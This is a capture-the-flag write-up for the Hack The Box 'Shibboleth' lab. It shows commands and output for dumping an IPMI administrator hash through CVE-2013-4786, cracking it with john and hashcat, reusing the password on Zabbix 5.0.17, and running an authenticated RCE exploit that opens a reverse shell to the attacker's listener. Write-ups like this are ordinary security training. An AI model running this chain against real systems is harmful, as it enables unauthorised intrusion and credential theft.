Password Hash Retrieval
the target instance of ipmi service was confirmed be vulnerable to both [[shibboleth_cve-2013-4782#cve-2013-4782|CVE-2013-4782]] and [[Shibboleth_CVE-2013-4786#CVE-2013-4786|CVE-2013-4786]]
as the administrator user is present, i will be exploiting [[shibboleth_cve-2013-4786#cve-2013-4786|CVE-2013-4786]] to retrieve the password hash
┌──(kali㉿kali)-[~/…/htb/labs/shibboleth/ipmiPwner]
└─$ sudo -E python3 ipmipwner.py --host $IP -u Administrator -oH ./Administrator.hash
[*] Checking if port 623 for host 10.10.11.124 is active
[*] the username: Administrator is valid
[*] saving hash for user: Administrator in file: "./Administrator.hash"
[*] the hash for user: Administrator
\_ $rakp$a4a3a2a082160000c9539728dc6c28dff643875269e7331a86cf763b1c4dfa064e7ee49e024495bba123456789abcdefa123456789abcdef140d41646d696e6973747261746f72$f26d1dfcea57d31f9cbdd89f6e2bfd5e08f0430aPassword hash for the Administrator user is extracted
Password Cracking
┌──(kali㉿kali)-[~/…/htb/labs/shibboleth/ipmiPwner]
└─$ john ./Administrator.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 128/128 AVX 4x])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovepumkinpie1 (10.10.11.124 Administrator)
1g 0:00:00:00 DONE (2023-04-17 20:03) 1.333g/s 9961Kp/s 9961Kc/s 9961KC/s iluve.p..iargxe
Use the "--show" option to display all of the cracked passwords reliably
Session completed. John cracked the password hash
The password for the Administrator user is ilovepumkinpie1
Metasploit/hashcat
┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ msfconsole -q
msf6 >
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) >
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSt 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set OUTPUT_HASHCAT_FILE Administrator.hash.msf
OUTPUT_HASHCAT_FILE => Administrator.hash.msf
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > options
module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common passwords as they are obtained
OUTPUT_HASHCAT_FILE ./administrator.hash.msf no Save captured password hashes in hashcat format
OUTPUT_JOHN_FILE no Save captured password hashes in john the ripper format
PASS_FILE /usr/share/metasploit-framework/d yes File containing common passwords for offline cracking, one
ata/wordlists/ipmi_passwords.txt per line
rhosts 10.10.11.124 yes the target host(s), see https://github.com/rapid7/metasplo
it-framework/wiki/Using-Metasploit
RPORT 623 yes The target port
SESSION_MAX_ATTEMPTS 5 yes Maximum number of session retries, required on certain BMC
s (HP iLO 4, etc)
SESSION_RETRY_DELAY 5 yes Delay between session retries in seconds
THREADS 1 yes The number of concurrent threads (max one per host)
USER_FILE /usr/share/metasploit-framework/d yes File containing usernames, one per line
ata/wordlists/ipmi_users.txt
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ hashcat -a 0 -m 7300 Administrator.hash.msf /usr/share/wordlists/rockyou.txt --username
hashcat (v6.2.6) starting
hashes: 2 digests; 2 unique digests, 2 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
5c89a303020f000079b01725c35a06c0c281730922a90fb06fcc688f5368af935cd78ba32f06046aa123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:ad1855159b8f141faf1c652e2fe66ba568cccca1:ilovepumkinpie1
session..........: hashcat
status...........: Cracked
hash.mode........: 7300 (IPMI2 RAKP HMAC-SHA1)
hash.target......: administrator.hash
time.started.....: Mon Apr 17 19:39:28 2023 (2 secs)
time.estimated...: Mon Apr 17 19:39:30 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........: 2887.0 kH/s (0.38ms) @ Accel:512 Loops:1 Thr:1 Vec:8
recovered........: 2/2 (100.00%) Digests (total), 1/2 (50.00%) Digests (new), 2/2 (100.00%) Salts
progress.........: 14794752/28688770 (51.57%)
rejected.........: 0/14794752 (0.00%)
restore.point....: 7394304/14344385 (51.55%)
restore.sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: ilovequay -> ilovemymum64.
hardware.mon.#1..: Util: 47%
started: Mon Apr 17 19:39:26 2023
stopped: Mon Apr 17 19:39:31 2023This can also be done through msfconsole & hashcat
Remote Code Execution
Earlier, I found out that the target web server has a virtual host at zabbix.shibboleth.htb, which is hosting an instance of Zabbix
While I was unable to proceed forward as I did not have a valid credential, I will test the IPMI credential against it
Successfully authenticated.
Password reuse confirmed
The footer indicates that it’s Zabbix 5.0.17
┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ searchsploit Zabbix 5.0.17
------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50816.py
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No ResultsRCE is available for Zabbix 5.0.17
┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ python3 zabbix_rce.py -h
[*] this exploit is tested against Zabbix 5.0.17 only
[*] can reach the author @ https://hussienmisbah.github.io/
[!] usage : ./expoit.py <target url> <username> <password> <attacker ip> <attacker port>This exploit doesn’t have an assigned CVE
┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ python3 zabbix_rce.py http://zabbix.shibboleth.htb Administrator ilovepumkinpie1 10.10.14.7 9999
[*] this exploit is tested against Zabbix 5.0.17 only
[*] can reach the author @ https://hussienmisbah.github.io/
[+] the payload has been Uploaded Successfully
[+] you should find it at http://zabbix.shibboleth.htb/items.php?form=update&hostid=10084&itemid=33617
[+] set the listener at 9999 please...Launching the exploit
┌──(kali㉿kali)-[~/archive/htb/labs/shibboleth]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.124] 34952
sh: 0: can't access tty; job control turned off
$ whoami
zabbix
$ hostname
shibboleth
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.124 netmask 255.255.255.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:967b prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:967b prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:96:7b txqueuelen 1000 (Ethernet)
RX packets 5961 bytes 912550 (912.5 KB)
RX errors 0 dropped 28 overruns 0 frame 0
TX packets 6905 bytes 2090524 (2.0 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 96670 bytes 9171958 (9.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 96670 bytes 9171958 (9.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Initial Foothold established to the target system as the zabbix user via RCE